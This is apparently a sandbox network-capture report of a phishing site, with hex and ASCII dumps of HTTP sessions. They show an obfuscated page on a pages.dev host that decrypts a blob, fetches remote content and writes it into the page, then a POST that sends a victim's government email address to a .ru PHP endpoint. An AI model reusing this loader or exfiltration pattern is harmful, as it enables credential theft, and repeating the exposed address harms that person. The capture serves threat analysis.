                                                                2024-08-27 18:03:42 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2024-08-27 18:03:42 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.1649745172.66.47.1114433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:42 UTC670OUTGET /, HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:42 UTC788INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:42 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U7%2BK5hrqUk8%2Bv3S2CzKfyl4T%2Brrst8y91qI8Q5qwViKcMnOjLWNNxoHM5lYf6%2FemYFORrI8JlwH%2BD66s24645unYMudINmOWUWaovHuWQXcIdZK3mtOYGRvi02Y7MUJwEctCwjxvcIrVGJWFOtAf9ioLlU1tBjQVFCsTPwIykuyY%2Fp8b75CXU1yB%2B1PzBJDZKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfad54aa65e71-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:42 UTC581INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 67 68 74 3a 20 31 37 39 70 78 3b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 39 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 70 78 3b 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 68 61 64 6f 77 2d 66 61 64 65 20 7b 30 25 2c 20 31 30 30 25 2c 20 32 31 2e 32 25 2c 20 38 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 30 3b 7d 34 37 25 2c 20 37 30 25 20 7b 6f 70 61 63 69 74 79 3a 20 31 3b 7d 7d 23 68 61 62 69 74 61 74 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 39 70 78 3b 7d 23 68 61 69 6c 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 37 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 20 30 20 37 70
                                                                Data Ascii: ght: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#habitat {width: 130px;margin-top: 179px;}#hail {width: 130px;height: 71px;border-radius: 0 0 7p
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 20 33 39 2e 33 33 33 33 70 78 3b 68 65 69 67 68 74 3a 20 33 38 70 78 3b 7d 2e 77 61 69 6e 73 63 6f 74 69 6e 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 37 33 63 63 3b 7d 2e 69 63 68 74 68 79 6f 6c 6f 67 69 73 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 37 61 30 65 30 3b 7d 2e 69 63 6f 6e 6f 67 72 61 70 68 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 66 63 66 66 66 3b 7d 2e 61 62 64 75 63 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 33 35 66 62 33 3b 7d 2e 6b 61 79 61 6b 69 6e 67 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 33 34 32 37 36 3b 7d 23 64 61 68 6c 69 61 20 7b 77 69 64 74 68 3a 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 20 31 30 37 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 70 65 6e 65 64 2d 66 6c 61 70 2d 73 77
                                                                Data Ascii: 39.3333px;height: 38px;}.wainscoting {background: #0073cc;}.ichthyologist {background: #27a0e0;}.iconography {background: #4fcfff;}.abduct {background: #035fb3;}.kayaking {background: #134276;}#dahlia {width: 130px;height: 107px;animation: opened-flap-sw
                                                                2024-08-27 18:03:42 UTC1369INData Raw: 69 65 6e 63 65 20 61 6e 64 20 70 65 72 73 65 76 65 72 61 6e 63 65 2e 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 69 63 65 64 22 20 68 69 64 64 65 6e 3e 3c 64 69 76 20 69 64 3d 22 68 61 62 69 74 61 74 22 3e 3c 64 69 76 20 69 64 3d 22 64 61 68 6c 69 61 22 3e 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 64 72 6f 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 63 6f 6e 69 63 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 63 61 62 69 6e 65 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 61 63 6b 73 74 72 61 77 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 62 61 73 68 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 61 62 6c 6f 69 64 20 77 61 69 6e 73 63 6f 74 69 6e 67 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20
                                                                Data Ascii: ience and perseverance. --><div id="iced" hidden><div id="habitat"><div id="dahlia"><div id="backdrop"><div class="laconic"></div></div></div><div id="cabinet"><div class="jackstraw"></div><div class="abash"><div class="tabloid wainscoting"></div><div
                                                                2024-08-27 18:03:42 UTC1262INData Raw: 20 7b 0d 0a 09 09 69 63 65 64 2e 68 69 64 64 65 6e 20 3d 20 30 3b 0d 0a 09 09 79 65 61 72 6e 2e 68 69 64 64 65 6e 20 3d 20 31 3b 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 61 77 61 69 74 20 6c 61 62 6f 72 65 64 28 61 77 61 69 74 20 28 61 77 61 69 74 20 66 65 74 63 68 28 61 77 61 69 74 20 6c 61 62 6f 72 65 64 28 61 74 6f 62 28 60 65 79 4a 68 49 6a 6f 69 63 56 52 54 55 30 6c 78 65 55 68 6d 57 58 63 34 61 6a 52 53 59 58 70 57 4f 46 5a 54 51 30 5a 31 55 30 35 6c 54 43 74 63 4c 32 34 79 57 6c 46 75 64 45 31 50 56 7a 42 49 56 44 67 39 49 69 77 69 59 79 49 36 49 6a 6b 32 5a 6a 6b 34 59 7a 67 30 4d 6d 46 6d 4f 54 4a 6a 4e 54 4a 6b 4e 44 46 6a 4f 47 51 32 59 6a 55 78 5a 44 51 31 4f 54 63 32 49 69 77 69 59 69 49 36 49 6a 63 32 59 7a
                                                                Data Ascii: {iced.hidden = 0;yearn.hidden = 1; document.write(await labored(await (await fetch(await labored(atob(`eyJhIjoicVRTU0lxeUhmWXc4ajRSYXpWOFZTQ0Z1U05lTCtcL24yWlFudE1PVzBIVDg9IiwiYyI6Ijk2Zjk4Yzg0MmFmOTJjNTJkNDFjOGQ2YjUxZDQ1OTc2IiwiYiI6Ijc2Yz
                                                                2024-08-27 18:03:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.1649750104.21.51.1384433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:43 UTC775OUTPOST ///4539.php HTTP/1.1
                                                                Host: glansaolksnu.ru
                                                                Connection: keep-alive
                                                                Content-Length: 34
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Accept: application/json, text/javascript, */*; q=0.01
                                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Origin: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:43 UTC34OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 3d 6d 74 68 61 6f 40 73 61 6e 74 61 63 6c 61 72 61 63 61 2e 67 6f 76
                                                                Data Ascii: do=check&em=mthao@santaclaraca.gov
                                                                2024-08-27 18:03:44 UTC784INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-powered-by: PHP/7.3.33
                                                                access-control-allow-origin: *
                                                                cache-control: no-store, no-cache, must-revalidate, max-age=0
                                                                pragma: no-cache
                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3O%2BNH%2FdIvH%2Bnm%2FvpTRz9IMsVVBA1HNbzxFyuXu9CF5YXK3ta90ayEkabrM7B%2FhccnsRc9rHmf%2BUe3GVoyOyReHJg5NqfHhZAC9NAJIFHLChfNhUU3dRhNrfY9G%2BkQ0p3Cxc%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfadb0f9f431b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:44 UTC585INData Raw: 33 32 63 33 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 62 61 6e 6e 65 72 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 5c 2f 70 6e 67 3b 62 61 73 65 36 34 2c 5c 2f 39 6a 5c 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 5c 2f 34 67 49 6f 53 55 4e 44 58 31 42 53 54 30 5a 4a 54 45 55 41 41 51 45 41 41 41 49 59 41 41 41 41 41 41 49 51 41 41 42 74 62 6e 52 79 55 6b 64 43 49 46 68 5a 57 69 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 68 59 33 4e 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 39 74 59 41 41 51 41 41 41 41 44 54 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                Data Ascii: 32c3{"status":"success","banner":"data:image\/png;base64,\/9j\/4AAQSkZJRgABAQAAAQABAAD\/4gIoSUNDX1BST0ZJTEUAAQEAAAIYAAAAAAIQAABtbnRyUkdCIFhZWiAAAAAAAAAAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 41 41 46 68 5a 57 69 41 41 41 41 41 41 41 41 42 76 6f 67 41 41 4f 50 55 41 41 41 4f 51 57 46 6c 61 49 41 41 41 41 41 41 41 41 47 4b 5a 41 41 43 33 68 51 41 41 47 4e 70 59 57 56 6f 67 41 41 41 41 41 41 41 41 4a 4b 41 41 41 41 2b 45 41 41 43 32 7a 33 42 68 63 6d 45 41 41 41 41 41 41 41 51 41 41 41 41 43 5a 6d 59 41 41 50 4b 6e 41 41 41 4e 57 51 41 41 45 39 41 41 41 41 70 62 41 41 41 41 41 41 41 41 41 41 42 59 57 56 6f 67 41 41 41 41 41 41 41 41 39 74 59 41 41 51 41 41 41 41 44 54 4c 57 31 73 64 57 4d 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 78 6c 62 6c 56 54 41 41 41 41 49 41 41 41 41 42 77 41 52 77 42 76 41 47 38 41 5a 77 42 73 41 47 55 41 49 41 42 4a 41 47 34 41 59 77 41 75 41 43 41 41 4d 67 41 77 41 44 45 41 4e 76 5c 2f 62 41 45 4d 41 5c 2f 5c 2f 5c
                                                                Data Ascii: AAFhZWiAAAAAAAABvogAAOPUAAAOQWFlaIAAAAAAAAGKZAAC3hQAAGNpYWVogAAAAAAAAJKAAAA+EAAC2z3BhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABYWVogAAAAAAAA9tYAAQAAAADTLW1sdWMAAAAAAAAAAQAAAAxlblVTAAAAIAAAABwARwBvAG8AZwBsAGUAIABJAG4AYwAuACAAMgAwADEANv\/bAEMA\/\/\
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 4d 73 74 64 70 7a 5c 2f 41 4e 79 79 6b 2b 58 50 76 6c 66 5c 2f 61 68 4d 62 65 39 34 64 4f 31 78 37 64 6f 43 64 54 48 58 62 64 76 37 4e 79 31 4c 4c 62 78 34 4f 71 33 74 6a 2b 57 7a 47 54 76 65 39 42 6e 36 73 76 61 4e 6d 4d 6e 76 38 74 74 31 79 6a 72 33 32 78 5c 2f 63 48 52 6b 79 6c 75 74 6e 6a 76 7a 70 79 31 32 33 4f 5a 51 64 6d 57 36 6c 72 4d 62 75 66 79 32 7a 63 73 42 45 78 36 70 75 32 71 78 6c 6d 39 33 74 34 54 4d 75 6e 74 59 33 47 32 33 66 67 47 66 33 5c 2f 38 41 76 52 30 63 37 75 5a 62 31 62 5c 2f 2b 4b 6d 57 39 39 72 4e 41 7a 4b 37 73 78 68 68 65 5a 36 4d 6b 79 74 75 58 48 79 59 39 73 72 4b 43 73 73 74 4d 6d 58 69 7a 54 4d 75 2b 57
                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACMstdpz\/ANyyk+XPvlf\/ahMbe94dO1x7doCdTHXbdv7Ny1LLbx4Oq3tj+WzGTve9Bn6svaNmMnv8tt1yjr32x\/cHRkylutnjvzpy123OZQdmW6lrMbufy2zcsBEx6pu2qxlm93t4TMuntY3G23fgGf3\/8AvR0c7uZb1b\/+KmW99rNAzK7sxhheZ6MkytuXHyY9srKCsstMmXizTMu+W
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 51 4f 4f 50 31 52 32 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 5a 65 30 32 31 4f 58 30 30 48 48 6b 41 47 79 57 38 4b 36 4d 76 5a 65 50 30 78 51 4d 6e 45 2b 47 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 35 35 33 78 2b 56 32 36 6d 33 4c 47 62 75 37 78 4f 39 42 65 4d 31 50 65 5c 2f 6c 6c 38 59 53 5c 2f 4e 62 64 66 56 2b 47 34 7a 55 33 65 61 44 5a 4e 54 53 63 39 36 2b 5c 2f 64 65 5c 2f 41 44 6e 75 35 64 70 32 68 6a 76 64 78 76 65 4b 73 74 34 75 6d 79 61 41 6b 31 4e 52 4e 79 38 59 38 5c 2f 77 5a 58 2b 32 63 5c 2f 77 53 65 4a 39 36 44 4a 4e 64 70 33 79 38 33 30 4e 61 35 35 58 4a 72 68 6f 4a 30 61 55 43 52 41 74 4f 6c 49 77 41 52 6a 51 41 41 41 41 41 59
                                                                Data Ascii: QOOP1R2AAAAAAAAAAAAAAAAAAAAAAAZe021OX00HHkAGyW8K6MvZeP0xQMnE+GgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA553x+V26m3LGbu7xO9BeM1Pe\/ll8YS\/NbdfV+G4zU3eaDZNTSc96+\/de\/ADnu5dp2hjvdxveKst4umyaAk1NRNy8Y8\/wZX+2c\/wSeJ96DJNdp3y830Na55XJrhoJ0aUCRAtOlIwARjQAAAAAY
